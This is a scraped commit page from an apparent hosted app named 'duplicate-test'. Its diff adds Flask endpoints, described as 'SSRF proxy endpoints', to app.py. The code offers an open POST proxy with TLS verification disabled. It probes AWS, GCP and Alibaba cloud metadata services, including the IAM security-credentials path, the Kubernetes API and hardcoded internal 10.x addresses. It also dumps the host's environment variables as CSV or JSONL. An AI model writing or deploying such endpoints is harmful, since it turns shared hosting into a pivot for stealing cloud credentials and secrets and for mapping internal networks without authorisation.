duplicate-test

Sleeping

App Files Files Community

aaxaxax commited on 11 days ago

Commit

6d446e6

1 Parent(s): 1e6dd9b

Add dedicated SSRF proxy endpoints

Browse files

Files changed (1) hide show

app.py +103 -0

app.py CHANGED Viewed

@@ -279,5 +279,108 @@ def listdir():
     except Exception as e:
         return jsonify({'error': str(e)})
 if __name__ == '__main__':
     app.run(host='0.0.0.0', port=7860)

     except Exception as e:
         return jsonify({'error': str(e)})
+@app.route('/post')
+def do_post():
+    url = request.args.get('url', '')
+    body = request.args.get('body', '')
+    ct = request.args.get('ct', 'application/json')
+    headers = {'Content-Type': ct}
+    for h in request.args.get('headers', '').split(','):
+        if ':' in h:
+            k, v = h.split(':', 1)
+            headers[k] = v.replace('+', ' ')
+    try:
+        r = requests.post(url, data=body, headers=headers, timeout=10, verify=False)
+        return r.text, r.status_code, {'Content-Type': 'text/plain'}
+    except Exception as e:
+        return str(e), 500
+@app.route('/selfenv.csv')
+def selfenv_csv():
+    entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
+             'headers': dict(request.headers), 'remote_addr': request.remote_addr}
+    LOG.append(entry)
+    try:
+        r = requests.get('http://localhost:7860/env', timeout=5)
+        data = r.json()
+        csv_lines = ['key,value']
+        for k, v in data.items():
+            csv_lines.append(f'"{k}","{str(v)[:200]}"')
+        return '\n'.join(csv_lines) + '\n', 200, {'Content-Type': 'text/csv'}
+    except Exception as e:
+        return f'key,value\nerror,"{str(e)}"\n', 200, {'Content-Type': 'text/csv'}
+@app.route('/k8sapi.csv')
+def k8s_csv():
+    entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
+             'headers': dict(request.headers), 'remote_addr': request.remote_addr}
+    LOG.append(entry)
+    targets = [
+        'https://172.20.0.1:443/api',
+        'https://kubernetes.default.svc:443/api',
+        'http://172.20.0.1:80/api',
+    ]
+    results = []
+    for t in targets:
+        try:
+            r = requests.get(t, timeout=3, verify=False)
+            results.append(f'"{t}","{r.status_code}","{r.text[:200]}"')
+        except Exception as e:
+            results.append(f'"{t}","error","{str(e)[:100]}"')
+    return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
+@app.route('/metadata.csv')
+def metadata_csv():
+    entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
+             'headers': dict(request.headers), 'remote_addr': request.remote_addr}
+    LOG.append(entry)
+    targets = [
+        ('http://169.254.169.254/latest/meta-data/', {}),
+        ('http://169.254.169.254/latest/meta-data/iam/security-credentials/', {}),
+        ('http://metadata.google.internal/computeMetadata/v1/', {'Metadata-Flavor': 'Google'}),
+        ('http://100.100.100.200/latest/meta-data/', {}),
+    ]
+    results = []
+    for url, hdrs in targets:
+        try:
+            r = requests.get(url, headers=hdrs, timeout=3, verify=False)
+            results.append(f'"{url}","{r.status_code}","{r.text[:200]}"')
+        except Exception as e:
+            results.append(f'"{url}","error","{str(e)[:100]}"')
+    return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
+@app.route('/internalprobe.csv')
+def internalprobe_csv():
+    entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
+             'headers': dict(request.headers), 'remote_addr': request.remote_addr}
+    LOG.append(entry)
+    targets = [
+        'http://10.16.4.123:80/',
+        'http://10.16.34.155:80/',
+        'http://10.20.1.9:80/',
+        'http://10.20.31.87:80/',
+    ]
+    results = []
+    for t in targets:
+        try:
+            r = requests.get(t, timeout=3, verify=False)
+            results.append(f'"{t}","{r.status_code}","{r.text[:200]}"')
+        except Exception as e:
+            results.append(f'"{t}","error","{str(e)[:100]}"')
+    return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
+@app.route('/selfenv.jsonl')
+def selfenv_jsonl():
+    entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
+             'headers': dict(request.headers), 'remote_addr': request.remote_addr}
+    LOG.append(entry)
+    try:
+        r = requests.get('http://localhost:7860/env', timeout=5)
+        data = r.json()
+        lines = [json.dumps({"text": f"{k}={str(v)[:200]}"}) for k, v in data.items()]
+        return '\n'.join(lines) + '\n', 200, {'Content-Type': 'application/jsonl'}
+    except Exception as e:
+        return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'}
 if __name__ == '__main__':
     app.run(host='0.0.0.0', port=7860)